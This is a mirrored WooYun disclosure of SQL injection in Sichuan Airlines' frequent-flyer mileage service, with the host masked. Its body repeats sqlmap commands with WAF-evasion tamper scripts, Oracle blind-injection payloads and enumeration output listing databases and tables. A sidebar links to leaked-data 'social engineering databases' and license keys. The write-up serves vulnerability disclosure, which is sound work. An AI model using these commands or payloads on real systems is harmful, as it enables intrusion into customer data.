四川航空某业务多处SQL处注入
- 发表于
- WooYun漏洞库
漏洞概要
缺陷编号:WooYun-2014-089008
漏洞标题:四川航空某业务多处SQL处注入
相关厂商:四川航空
漏洞作者:玉林嘎
提交时间:2014-12-29 22:34
公开时间:2015-02-10 22:36
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:17
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
漏洞详情
披露状态:
2014-12-29: 细节已通知厂商并且等待厂商处理中
2014-12-31: 厂商已经确认,细节仅向厂商公开
2015-01-10: 细节向核心白帽子及相关领域专家公开
2015-01-20: 细节向普通白帽子公开
2015-01-30: 细节向实习白帽子公开
2015-02-10: 细节向公众公开
简要描述:
rt
详细说明:
http://**.**.**.**/FFPNewWeb/四川航空会员俱乐部
2个查询 每个参数都存在注入1、sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
sqlmap identified the following injection points with a total of 116 HTTP(s) requests:<br> ---<br> Place: POST<br> Parameter: AirlineCode<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: AirlineCode=3U' AND 8979=8979 AND 'HGlz'='HGlz&OrgCity=CTU&DesCity=CAN&Page_Index=1Type: AND/OR time-based blind<br> Title: Oracle AND time-based blind<br> Payload: AirlineCode=3U' AND 2329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(121)||CHR(114)||CHR(101),5) AND 'tPVD'='tPVD&OrgCity=CTU&DesCity=CAN&Page_Index=1<br> ---<br> [20:05:03] [WARNING] changes made by tampering scripts are not included in shown payload content(s)<br> [20:05:03] [INFO] the back-end DBMS is Oracle<br> web server operating system: Windows 2003<br> web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0<br> back-end DBMS: Oracle |
sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent --dbs
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
available databases [16]:<br> [*] CTXSYS<br> [*] DBSNMP<br> [*] DMSYS<br> [*] EXFSYS<br> [*] MDSYS<br> [*] OLAPSYS<br> [*] ORDSYS<br> [*] OUTLN<br> [*] SCAR<br> [*] SCOTT<br> [*] SYS<br> [*] SYSMAN<br> [*] SYSTEM<br> [*] TSMSYS<br> [*] WMSYS<br> [*] XDB |
sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -D SCAR --tables
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 |
[20:31:16] [INFO] fetching number of tables for database 'SCAR'<br> [20:31:16] [INFO] resumed: 373<br> [20:31:16] [INFO] resumed: TBL_20110831_PRO<br> [20:31:16] [INFO] resuming partial value: BCK<br> [20:31:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br> [20:31:16] [INFO] retrieved: _LOG<br> [20:31:52] [INFO] retrieved: CJ_DLYP<br> [20:33:02] [INFO] retrieved: CJ_DLYPTMP<br> [20:33:44] [INFO] retrieved: CJ_ERRDES<br> [20:34:56] [INFO] retrieved: CJ_FLGAP<br> [20:35:58] [INFO] retrieved: CJ_FLGAT<br> [20:36:31] [INFO] retrieved: CJ_FLGAT_HIS<br> [20:37:35] [INFO] retrieved: CJ_FLTCN<br> [20:38:23] [INFO] retrieved: CJ_FLTCNTMP<br> [20:39:07] [INFO] retrieved: CJ_FLTCNTMQ<br> [20:39:41] [INFO] retrieved: CJ_IRFLP<br> [20:40:45] [INFO] retrieved: CJ_IRFLPTMP<br> [20:41:40] [INFO] retrieved: CJ_IRFLPTMQ<br> [20:42:14] [INFO] retrieved: CJ_IRFLP_BAK<br> [20:43:17] [INFO] retrieved: CJ_IRFLP_HIS<br> [20:44:07] [INFO] retrieved: CJ_OPDES<br> [20:45:04] [INFO] retrieved: CJ_OPERATORS<br> [20:46:16] [INFO] retrieved: CJ_OPGAT<br> [20:46:57] [INFO] retrieved: CJ_PNRPTMP<br> [20:48:11] [INFO] retrieved: CJ_RECORDNUM<br> [20:49:39] [INFO] retrieved: CJ_VAFLP<br> [20:50:40] [INFO] retrieved: CJ_VAFLPTMP<br> [20:51:27] [INFO] retrieved: PERSON<br> [20:52:28] [INFO] retrieved: PLAN_TABLE<br> [20:53:58] [INFO] retrieved: TBL_ACTION<br> [20:55:31] [INFO] retrieved: TBL_ADDRESS_CITY<br> [20:57:26] [INFO] retrieved: TBL_AIRLINE<br> [20:58:31] [INFO] retrieved: TBL_AIRLINE_CODE_SHARE<br> [21:00:30] [INFO] retrieved: TBL_AIRPORT<br> [21:01:21] [INFO] retrieved: TBL_AUDITOR<br> [21:02:31] [INFO] retrieved: TBL_BUSINESS_TYPE<br> [21:04:32] [INFO] retrieved: TBL_CHARACTER_SPELL_INDEX<br> [21:07:47] [INFO] retrieved: TBL_CITY<br> [21:08:29] [INFO] retrieved: TBL_CLASS<br> [21:09:17] [INFO] retrieved: TBL_CLASS_MULTIPLIER_RULE<br> [21:11:47] [INFO] retrieved: TBL_CLASS_TYPE<br> [21:12:33] [INFO] retrieved: TBL_COMPANY_ACCOUNT<br> [21:14:52] [INFO] retrieved: TBL_COMPANY_EXTRA_ACTIVITY<br> [21:17:38] [INFO] retrieved: TBL_COMPANY_FLIGHT_ACTIVITY<br> [21:20:22] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM<br> [21:21:51] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_IRR<br> [21:23:17] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_TEM<br> [21:24:36] [INFO] retrieved: TBL_COMPANY_ID_CHANGE_HIS<br> [21:27:01] [INFO] retrieved: TBL_COMPANY_ID_MERGE_HIS<br> [21:29:01] [INFO] retrieved: TBL_COMPANY_INFO<br> [21:29:55] [INFO] retrieved: TBL_COMPANY_MEMBER<br> [21:31:14] [INFO] retrieved: TBL_COMPANY_MILE_EXPIRE_ACT<br> [21:34:09] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM<br> [21:36:26] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM_TEMP<br> [21:38:00] [INFO] retrieved: TBL_COMPANY_NFLT_REJECT_REDEEM<br> [21:40:11] [INFO] retrieved: TBL_COMPANY_PIN_CHANGE_HISTORY<br> [21:43:30] [INFO] retrieved: TBL_COMPANY_SPECIAL_SEGMENT<br> [21:46:08] [INFO] retrieved: TBL_COMPANY_TYPE<br> [21:47:18] [INFO] retrieved: TBL_COUNTRY<br> [21:48:20] [INFO] retrieved: TBL_CREDIT_CARD_COMPANY |
2、sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QuerySegmentMiles" --data "OrgCity=CTU&DesCity=CAN" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
sqlmap identified the following injection points with a total of 51 HTTP(s) requests:<br> ---<br> Place: POST<br> Parameter: OrgCity<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: OrgCity=CTU') AND 6813=6813 AND ('WPeh'='WPeh&DesCity=CANType: AND/OR time-based blind<br> Title: Oracle AND time-based blind<br> Payload: OrgCity=CTU') AND 1355=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(114)||CHR(112)||CHR(77),5) AND ('OdJe'='OdJe&DesCity=CAN<br> ---<br> [20:08:53] [WARNING] changes made by tampering scripts are not included in shown payload content(s)<br> [20:08:53] [INFO] the back-end DBMS is Oracle<br> web server operating system: Windows 2003<br> web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0<br> back-end DBMS: Oracle |
跟第一个一样的
漏洞证明:
http://**.**.**.**/FFPNewWeb/四川航空会员俱乐部
2个查询 每个参数都存在注入1、sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
sqlmap identified the following injection points with a total of 116 HTTP(s) requests:<br> ---<br> Place: POST<br> Parameter: AirlineCode<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: AirlineCode=3U' AND 8979=8979 AND 'HGlz'='HGlz&OrgCity=CTU&DesCity=CAN&Page_Index=1Type: AND/OR time-based blind<br> Title: Oracle AND time-based blind<br> Payload: AirlineCode=3U' AND 2329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(121)||CHR(114)||CHR(101),5) AND 'tPVD'='tPVD&OrgCity=CTU&DesCity=CAN&Page_Index=1<br> ---<br> [20:05:03] [WARNING] changes made by tampering scripts are not included in shown payload content(s)<br> [20:05:03] [INFO] the back-end DBMS is Oracle<br> web server operating system: Windows 2003<br> web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0<br> back-end DBMS: Oracle |
sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent --dbs
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
available databases [16]:<br> [*] CTXSYS<br> [*] DBSNMP<br> [*] DMSYS<br> [*] EXFSYS<br> [*] MDSYS<br> [*] OLAPSYS<br> [*] ORDSYS<br> [*] OUTLN<br> [*] SCAR<br> [*] SCOTT<br> [*] SYS<br> [*] SYSMAN<br> [*] SYSTEM<br> [*] TSMSYS<br> [*] WMSYS<br> [*] XDB |
sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -D SCAR --tables
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 |
[20:31:16] [INFO] fetching number of tables for database 'SCAR'<br> [20:31:16] [INFO] resumed: 373<br> [20:31:16] [INFO] resumed: TBL_20110831_PRO<br> [20:31:16] [INFO] resuming partial value: BCK<br> [20:31:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br> [20:31:16] [INFO] retrieved: _LOG<br> [20:31:52] [INFO] retrieved: CJ_DLYP<br> [20:33:02] [INFO] retrieved: CJ_DLYPTMP<br> [20:33:44] [INFO] retrieved: CJ_ERRDES<br> [20:34:56] [INFO] retrieved: CJ_FLGAP<br> [20:35:58] [INFO] retrieved: CJ_FLGAT<br> [20:36:31] [INFO] retrieved: CJ_FLGAT_HIS<br> [20:37:35] [INFO] retrieved: CJ_FLTCN<br> [20:38:23] [INFO] retrieved: CJ_FLTCNTMP<br> [20:39:07] [INFO] retrieved: CJ_FLTCNTMQ<br> [20:39:41] [INFO] retrieved: CJ_IRFLP<br> [20:40:45] [INFO] retrieved: CJ_IRFLPTMP<br> [20:41:40] [INFO] retrieved: CJ_IRFLPTMQ<br> [20:42:14] [INFO] retrieved: CJ_IRFLP_BAK<br> [20:43:17] [INFO] retrieved: CJ_IRFLP_HIS<br> [20:44:07] [INFO] retrieved: CJ_OPDES<br> [20:45:04] [INFO] retrieved: CJ_OPERATORS<br> [20:46:16] [INFO] retrieved: CJ_OPGAT<br> [20:46:57] [INFO] retrieved: CJ_PNRPTMP<br> [20:48:11] [INFO] retrieved: CJ_RECORDNUM<br> [20:49:39] [INFO] retrieved: CJ_VAFLP<br> [20:50:40] [INFO] retrieved: CJ_VAFLPTMP<br> [20:51:27] [INFO] retrieved: PERSON<br> [20:52:28] [INFO] retrieved: PLAN_TABLE<br> [20:53:58] [INFO] retrieved: TBL_ACTION<br> [20:55:31] [INFO] retrieved: TBL_ADDRESS_CITY<br> [20:57:26] [INFO] retrieved: TBL_AIRLINE<br> [20:58:31] [INFO] retrieved: TBL_AIRLINE_CODE_SHARE<br> [21:00:30] [INFO] retrieved: TBL_AIRPORT<br> [21:01:21] [INFO] retrieved: TBL_AUDITOR<br> [21:02:31] [INFO] retrieved: TBL_BUSINESS_TYPE<br> [21:04:32] [INFO] retrieved: TBL_CHARACTER_SPELL_INDEX<br> [21:07:47] [INFO] retrieved: TBL_CITY<br> [21:08:29] [INFO] retrieved: TBL_CLASS<br> [21:09:17] [INFO] retrieved: TBL_CLASS_MULTIPLIER_RULE<br> [21:11:47] [INFO] retrieved: TBL_CLASS_TYPE<br> [21:12:33] [INFO] retrieved: TBL_COMPANY_ACCOUNT<br> [21:14:52] [INFO] retrieved: TBL_COMPANY_EXTRA_ACTIVITY<br> [21:17:38] [INFO] retrieved: TBL_COMPANY_FLIGHT_ACTIVITY<br> [21:20:22] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM<br> [21:21:51] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_IRR<br> [21:23:17] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_TEM<br> [21:24:36] [INFO] retrieved: TBL_COMPANY_ID_CHANGE_HIS<br> [21:27:01] [INFO] retrieved: TBL_COMPANY_ID_MERGE_HIS<br> [21:29:01] [INFO] retrieved: TBL_COMPANY_INFO<br> [21:29:55] [INFO] retrieved: TBL_COMPANY_MEMBER<br> [21:31:14] [INFO] retrieved: TBL_COMPANY_MILE_EXPIRE_ACT<br> [21:34:09] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM<br> [21:36:26] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM_TEMP<br> [21:38:00] [INFO] retrieved: TBL_COMPANY_NFLT_REJECT_REDEEM<br> [21:40:11] [INFO] retrieved: TBL_COMPANY_PIN_CHANGE_HISTORY<br> [21:43:30] [INFO] retrieved: TBL_COMPANY_SPECIAL_SEGMENT<br> [21:46:08] [INFO] retrieved: TBL_COMPANY_TYPE<br> [21:47:18] [INFO] retrieved: TBL_COUNTRY<br> [21:48:20] [INFO] retrieved: TBL_CREDIT_CARD_COMPANY |
2、sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QuerySegmentMiles" --data "OrgCity=CTU&DesCity=CAN" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
sqlmap identified the following injection points with a total of 51 HTTP(s) requests:<br> ---<br> Place: POST<br> Parameter: OrgCity<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: OrgCity=CTU') AND 6813=6813 AND ('WPeh'='WPeh&DesCity=CANType: AND/OR time-based blind<br> Title: Oracle AND time-based blind<br> Payload: OrgCity=CTU') AND 1355=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(114)||CHR(112)||CHR(77),5) AND ('OdJe'='OdJe&DesCity=CAN<br> ---<br> [20:08:53] [WARNING] changes made by tampering scripts are not included in shown payload content(s)<br> [20:08:53] [INFO] the back-end DBMS is Oracle<br> web server operating system: Windows 2003<br> web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0<br> back-end DBMS: Oracle |
跟第一个一样的
修复方案:
过滤
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2014-12-3117:12
厂商回复:
CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向网站管理单位通报。
最新状态:
暂无
评价
-
2010-01-01 00:00 伤剑 白帽子 | Rank:15 漏洞数:1)
--tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent --dbs 不是--tamper=randomcase.py, 洞主 解答 还有这个--random-agent
原文连接:四川航空某业务多处SQL处注入
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
- N/A
- 2020 Google镜像大全,谷歌镜像网址
- BT磁力搜索引擎大全
- Javaweb架构分析安全之万户ezoffice全版本通杀上传GETSHELL
- 东方网景某严重安全漏洞(可导致上万网站沦陷/域名劫持/FTP服务安全/集群安全等可受到影响)
- 暗网是什么?如何进入暗网?
- 最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码
- No Access-Control-Allow-Origin 跨域错误解决
- 社工库源码大全(持续更新)
- 谷歌识图,以图搜图
- this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法
- 【透明互联网】社工库 Social Engineering Data
- 怎么用图片搜索番号?
- 一个绕过Google谷歌验证码(reCAPTCHA)的方法
- 9部有史以来最好的黑客电影
- 手机BT/种子下载,手机磁力链下载软件整理
扫码分享
验证:
体验盒子扫码分享
打赏零钱
